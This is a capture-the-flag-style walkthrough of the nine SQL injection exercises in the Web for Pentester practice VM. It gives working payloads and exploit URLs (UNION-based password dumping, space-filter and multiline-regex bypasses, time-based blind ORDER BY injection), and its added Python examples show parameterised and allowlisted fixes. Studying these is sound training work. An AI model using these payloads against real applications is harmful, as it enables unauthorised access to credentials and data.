Web for pentester VM SQL-Injection Examples Walk-through | SQL-Injection Solutions

Web for Pentester is a pre-configured virtual machine ISO prepared by PentesterLab for practicing web pentesting. In this article we are going to look at the SQL injection exercises. To set up the virtual machine, please visit the link below:

Link : Install and configure Web for Pentester VM

In the Web for Pentester VM there are 9 exercises for SQL injection vulnerabilities, which are as follows:


To start with the examples, just click on an example link and the example page will open.


In the above screenshot we can see the example 1 page. Now let's start with the examples.

Example 1 :

The first example takes a user name as input and returns the details of the given user.


We can break the query with a single quote (') and after that use the OR operator to balance out the query. Now our SQLi payload will be:
 ' or 1=1 --+


To find the number of columns in the table we can use the payload below:
 root' order by 5 --+
The database returns output for the above query, and when we increase 5 to 6 it does not return anything, which means there are 5 columns in the table.

Extracting data from the database :

With union query :

payload :
 ' union select 1,2,3,4,5 --+
 http://192.168.56.101/sqli/example1.php?name=' union select 1,2,3,4,5 --+

As we can see, placeholders 1, 2 and 3 are displayed on the screen. So let's dump data from the database.

Payload :
 ' union select database(),version(),@@datadir,4,5 --+
 http://192.168.56.101/sqli/example1.php?name=' union select database(),version(),@@datadir,4,5 --+

database name :  exercise

Extracting Table name :

Payload :
 ' union select 1, 2, table_name, 4,5 from information_schema.tables where table_schema=database() limit 0, 1 --+
 http://192.168.56.101/sqli/example1.php?name=' union select 1,2,table_name, 4,5 from information_schema.tables where table_schema=database() limit 0,1 --+

Table name : users

Extracting column names :

Payload :
 ' union select 1, 2, column_name, 4,5 from information_schema.columns where table_name="users" limit 0, 1--+
 http://192.168.56.101/sqli/example1.php?name=' union select 1, 2, column_name, 4,5 from information_schema.columns where table_name="users" limit 0, 1 --+
Or we can use the MySQL group_concat() function to dump all column names at once.

Payload :
 ' union select 1, 2, group_concat(column_name), 4,5 from information_schema.columns where table_name="users" --+
 http://192.168.56.101/sqli/example1.php?name=' union select 1, 2, group_concat(column_name), 4,5 from information_schema.columns where table_name="users" --+

Column_names :  id, name, age, groupid, passwd

Now let's dump the names and passwords of all users:

Payload :
 ' union select 1, 2, group_concat(name,':', passwd), 4,5 from users --+
 http://192.168.56.101/sqli/example1.php?name=' union select 1, 2, group_concat(name,':', passwd), 4,5 from users --+

Example 2 :

In this example, the back-end server blocks the space character, so we need some kind of padding in place of the blank spaces in our query, for example %a0 (where %a0 is nothing but a garbage value that stands in for the space).

Now our query will be :

Payload :
 '%a0or%a01='1
Exploit :
 http://192.168.56.101/sqli/example2.php?name='%a0or%a01='1
Payloads for extracting data :

Payload :
 root'%a0union%a0select%a01,(select%a0group_concat(name,':',passwd)%a0from%a0users),3,4,5%a0and%a0'
Exploit :
 http://192.168.56.101/sqli/example2.php?name=root'%a0union%a0select%a01,(select%a0group_concat(name,':',passwd)%a0from%a0users),3,4,5%a0and%a0'

Example 3 :

Examples 2 and 3 differ slightly in the space filter expression.


The exploitation process is the same as in example 2.

Payload :
 '%a0or%a01='1
Exploit :
 http://192.168.56.101/sqli/example2.php?name='%a0or%a01='1
Payloads for extracting data :

Payload :
 root'%a0union%a0select%a01,(select%a0group_concat(name,':',passwd)%a0from%a0users),3,4,5%a0and%a0'
Exploit :
 http://192.168.56.101/sqli/example2.php?name=root'%a0union%a0select%a01,(select%a0group_concat(name,':',passwd)%a0from%a0users),3,4,5%a0and%a0'

Example 4 :

In example 4, the web app uses PHP's mysql_real_escape_string() function to escape the single quote, double quote and similar characters: \x00, \n, \r, \, ', " and \x1a. But because the payload below contains none of those characters, we can easily bypass it:

Payload :
 100 or 1=1 
Exploit :
 http://192.168.56.101/sqli/example4.php?id=100%20or%201=1
Above, 100 is used as a garbage value so the SQL engine evaluates the expression after OR.

Payload for extracting data :

Payload :
 100 union select 1,name,passwd,4,5 from users
Exploit :
 http://192.168.56.101/sqli/example4.php?id=100 union select 1,name,passwd,4,5 from users
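The two injection points covered so far (the quoted name in example 1 and the escaped but unquoted id in example 4) beside their hardened forms, as an added example that is not code from the VM or from PentesterLab. It uses an in-memory sqlite3 stand-in for the VM's MySQL "exercise" database (column names from the page, row values constructed) and a minimal stand-in for mysql_real_escape_string(); both are assumptions made so the code runs offline.

```python
import sqlite3
from typing import List, Tuple

# Constructed in-memory stand-in for the VM's "exercise" database (MySQL in the
# original; sqlite3 is used here so the example runs offline). Column names are
# the ones the page recovers (id, name, age, groupid, passwd); row values are made up.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, age INTEGER, groupid INTEGER, passwd TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", 40, 1, "hash-admin"),
        (2, "root", 35, 1, "hash-root"),
        (3, "user", 20, 2, "hash-user"),
    ])
    return db

def escape(value: str) -> str:
    """Stand-in for mysql_real_escape_string(): neutralises single quotes.
    SQLite escapes a quote by doubling it, so that is what is done here."""
    return value.replace("'", "''")

# Example 1: the name is concatenated straight into a quoted string literal.
def by_name_vulnerable(db: sqlite3.Connection, name: str) -> List[Tuple]:
    sql = f"SELECT id, name, age, groupid, passwd FROM users WHERE name = '{name}'"
    return db.execute(sql).fetchall()

# Example 4: the id is escaped but never quoted, so escaping changes nothing
# in a payload such as "100 or 1=1" that contains no quote characters.
def by_id_escaped(db: sqlite3.Connection, user_id: str) -> List[Tuple]:
    sql = f"SELECT id, name, age, groupid, passwd FROM users WHERE id = {escape(user_id)}"
    return db.execute(sql).fetchall()

# Hardened forms: the value travels as a bind parameter, never as SQL text,
# and the id is additionally cast so that only an integer can reach the query.
def by_name_safe(db: sqlite3.Connection, name: str) -> List[Tuple]:
    sql = "SELECT id, name, age, groupid, passwd FROM users WHERE name = ?"
    return db.execute(sql, (name,)).fetchall()

def by_id_safe(db: sqlite3.Connection, user_id: str) -> List[Tuple]:
    sql = "SELECT id, name, age, groupid, passwd FROM users WHERE id = ?"
    return db.execute(sql, (int(user_id),)).fetchall()  # int() raises on "100 or 1=1"

if __name__ == "__main__":
    db = make_db()
    print(len(by_name_vulnerable(db, "' or 1=1 --")), "rows via the example 1 payload")
    print(len(by_name_safe(db, "' or 1=1 --")), "rows with a bind parameter")
    print(len(by_id_escaped(db, "100 or 1=1")), "rows via the example 4 payload")
```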

Example 5 :

In this example, a regular expression is used to filter out unwanted characters and strings.


According to the above expression the input must begin with an integer. This can also be bypassed with the SQL query below.

Payload :
 100 or 1=1
Exploit :
 http://192.168.56.101/sqli/example5.php?id=100%20or%201=1
Payload for extracting data :

Payload :
 1000 union select 1,2,group_concat(name,':',passwd),4,5 from users
Exploit :
 http://192.168.56.101/sqli/example5.php?id=1000 union select 1,2,group_concat(name,':',passwd),4,5 from users

Example 6 :

This example is the same as example 5 except that it checks that the input must end with an integer.


We can bypass it with the query below.

Payload :
 100 or 1=1
Exploit :
 http://192.168.56.101/sqli/example6.php?id=100 or 1=1
Payload for extracting data :

Payload :
 1000 union select 1,2,group_concat(name,':',passwd),4,5 from users limit 0,1
Exploit :
 http://192.168.56.101/sqli/example6.php?id=1000 union select 1,2,group_concat(name,':',passwd),4,5 from users limit 0,1

Example 7 :

In example 7, the PHP code only accepts numerical values, and the regular expression checks both the start and the end of the provided input. The regular expression used is:


As we can see, the above expression contains the m modifier { preg_match('/^-?[0-9]+$/m') }, which is the PCRE_MULTILINE modifier. With it, ^ and $ match at the start and end of any line, so the filter only considers the first line of the input, and after a line terminator the regex does not filter any data. It can therefore be bypassed with a line terminator character, for example %0a.

So the payload will be :

Payload :
 100%0a or 1=1
Exploit :
 http://192.168.56.101/sqli/example7.php?id=100%0a or 1=1
Payload for extracting data :

Payload :
 1000%0aunion select 1,2,group_concat(name,':',passwd),4,5 from users limit 0,1
Exploit :
 http://192.168.56.101/sqli/example7.php?id=1000%0aunion select 1,2,group_concat(name,':',passwd),4,5 from users limit 0,1
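The three anchoring mistakes of examples 5, 6 and 7 reproduced as small validators, beside a whole-string check that rejects every one of the page's payloads; this is an added example, not the VM's PHP. The example 7 pattern is the one the page quotes; the example 5 and 6 patterns are assumed reconstructions of "must begin with" and "must end with" an integer. Python's re matches PCRE for these anchors: $ allows a trailing newline by default and, under MULTILINE, matches at every line end.

```python
import re
from typing import Optional

# Assumed reconstruction of the example 5 filter: anchored at the start only.
def filter_example5(value: str) -> bool:
    return re.search(r"^-?[0-9]+", value) is not None

# Assumed reconstruction of the example 6 filter: anchored at the end only.
def filter_example6(value: str) -> bool:
    return re.search(r"-?[0-9]+$", value) is not None

# The example 7 filter as quoted on the page: /^-?[0-9]+$/m.
# Under MULTILINE, $ matches before any newline, so "100\n or 1=1" passes.
def filter_example7(value: str) -> bool:
    return re.search(r"^-?[0-9]+$", value, re.MULTILINE) is not None

# Same pattern without /m. Still not safe: $ also matches before a trailing
# newline, so "100\n" passes even though the value is not a clean integer.
def filter_example7_without_m(value: str) -> bool:
    return re.search(r"^-?[0-9]+$", value) is not None

# Hardened check: fullmatch() requires the whole string to be an integer
# (no line ends, no trailing newline), then the value is cast so only an
# int ever reaches the query. Returns None when the input is rejected.
def validate_id(value: str) -> Optional[int]:
    if re.fullmatch(r"-?[0-9]+", value) is None:
        return None
    return int(value)

if __name__ == "__main__":
    for payload in ("100 or 1=1", "100\n or 1=1", "100\n", "100"):
        print(repr(payload), filter_example5(payload), filter_example6(payload),
              filter_example7(payload), validate_id(payload))
```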

Example 8 :

Example 8 takes the user input and uses it in the ORDER BY SQL statement. The code for this example is:


As we can see, a back-tick (`) is also used in the query. In this example we have to use time-based blind injection.

So the payload will be :

Payload :
 id`,(select if((database()) = database(), sleep(4), null))#
Exploit :
 http://192.168.56.101/sqli/example8.php?order=id`,(select if((database()) = database(), sleep(4), null))#
To know more about blind injection, visit the link below:

http://www.sec-art.net/2018/08/blind-sql-injection-types-of-sql.html

Example 9 :

Example 9 is the same as example 8, but in this example no back-tick is used.


So the payload will be :

Payload :
 id,(select if((database()) = database(), sleep(4), null))
Exploit :
 http://192.168.56.101/sqli/example9.php?order=id,(select if((database()) = database(), sleep(4), null))
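A defender's view of examples 8 and 9, added here and not part of the VM or the original post: ORDER BY cannot take a bind parameter, so the fix is an allowlist of sortable column names, and the same allowlist doubles as a detection check over access-log lines. The allowlist, the log format and the log lines are constructed; the host and paths follow the page.

```python
import re
from typing import List
from urllib.parse import parse_qs, urlsplit

# Columns of the page's users table that a client may sort by. The allowlist is
# an added defensive measure, not the VM's code; passwd is left out on purpose.
SORTABLE_COLUMNS = {"id", "name", "age", "groupid"}

def build_order_clause(column: str, direction: str = "asc") -> str:
    """ORDER BY cannot take a bind parameter, so the requested column is matched
    against a fixed allowlist first and only then back-tick quoted."""
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"unsortable column: {column!r}")
    direction = direction.lower()
    if direction not in ("asc", "desc"):
        raise ValueError(f"bad sort direction: {direction!r}")
    return f"ORDER BY `{column}` {direction.upper()}"

REQUEST_RE = re.compile(r'"GET (\S+) HTTP/')

def suspicious_order_params(log_lines: List[str]) -> List[str]:
    """Detection side: return every decoded order= value in access-log lines
    that is not a plain allowlisted column name."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for value in params.get("order", []):
            if value not in SORTABLE_COLUMNS:
                hits.append(value)
    return hits

# Constructed access-log lines (client address and timestamps are made up).
SAMPLE_LOG = [
    '192.168.56.1 - - [10/Aug/2018:10:00:01 +0000] "GET /sqli/example8.php?order=id HTTP/1.1" 200 1024',
    '192.168.56.1 - - [10/Aug/2018:10:00:05 +0000] "GET /sqli/example9.php?order=name HTTP/1.1" 200 1024',
    '192.168.56.1 - - [10/Aug/2018:10:00:09 +0000] "GET /sqli/example9.php?order=id,(select%20if((database())%20%3D%20database(),%20sleep(4),%20null)) HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    print(build_order_clause("name", "desc"))
    for hit in suspicious_order_params(SAMPLE_LOG):
        print("suspicious order parameter:", hit)
```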

Conclusion :

With the above we can exploit all the SQLi vulnerabilities in the Web for Pentester VM.

Also check out our other articles related to SQLi.